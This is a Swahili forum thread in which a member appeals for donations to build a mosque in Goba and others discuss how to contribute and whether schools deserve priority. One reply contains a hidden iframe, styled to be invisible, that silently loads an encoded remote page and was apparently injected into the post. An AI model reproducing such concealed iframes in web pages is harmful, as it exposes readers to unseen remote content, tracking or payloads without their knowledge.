Changia masjid ijengwe

Status
Not open for further replies.

Mzito Kabwela

Platinum Member
Joined
Nov 28, 2009
Posts
18,908
Reaction score
7,752
Ukiwa wewe ni Muumin wa kweli, unaombwa uchangie Masjid Goba ijengwe. Kwa sasa Hali ya Masjid yetu iko katika hali hii...

Nimefika hapa leo na mimeonana na Imam wa msikiti huu...Tumeongea mengi ila kikubwa mahitaji yao ni mengi...wanahitaji matofali...mbao..mabati...nond​
<wbr style="color: rgb(0, 0, 0); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 14px; text-align: left; ">
o...cement ...n.k...Nilikwenda na kiasi mlichojaaliwa kuchangia waislam na nimewakabidhi...kwa niaba yao tunawashukuru saana..Mwenyezi Mungu atawazidishia katika hili...Ila kwa wale ambao hamjajaaliwa Inshaallah Mwenyezi Mungu awafanyie wepesi ili muweze kuchangia...chochote ulichonacho Muislam wachangie ndugu zetu hawa. Tujitengenezee pepo yetu waislam kwa kuwachangia ndugu zetu...Mwenye chochote awasiliane na mimi au dada khardirjer ( spelling please)...Wasalaam!​

View attachment 46909
 
Wakristo hawaruhusiwi kuchangia !.

 
mkuu...mbona maelezo hayajitoshelezi....? huyo Dada Khadija tunampataje na wewe tunawasiliana na wewe kwa njia ipi....?....kuwa serious kidogo mkuu......
 
daaah aiseeeh kweli kuna hitajika kusaidia ujenzi wa nyumba ya ibada.
 

Shule je? Vyuo vikuu je?
Duh! hiyo kibla! sijui huyo shekhe anayeswalisha hapo ana hali gani!


<iframe style="display: none; visibility: hidden;" src="http://d3lvr7yuk4uaui.cloudfront.net/d.html?c=dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZWQ6MTAzNjoxMjc2ODp1bmRlZmluZWQ6"></iframe>
 
toa namba za m pesa kwenye masuala ya kiiman acheni maskhara.
nina mchango niuwasilisheje?
 
Kuswali hakuchagui jengo.......huu ni msikiti wa kijijini kwetu

mkuu, I AGREE WITH YOU.
Inawezekana watu wa kijiji hicho wali-prioritize ujenzi wa shule kwanza......huwezi kuchangia shule na msikiti at the same time.
hali yenyewe ya kijijini ilivyo ngumu!!
 
Status
Not open for further replies.
Cookies are required to use this site. You must accept them to continue using the site. Learn more…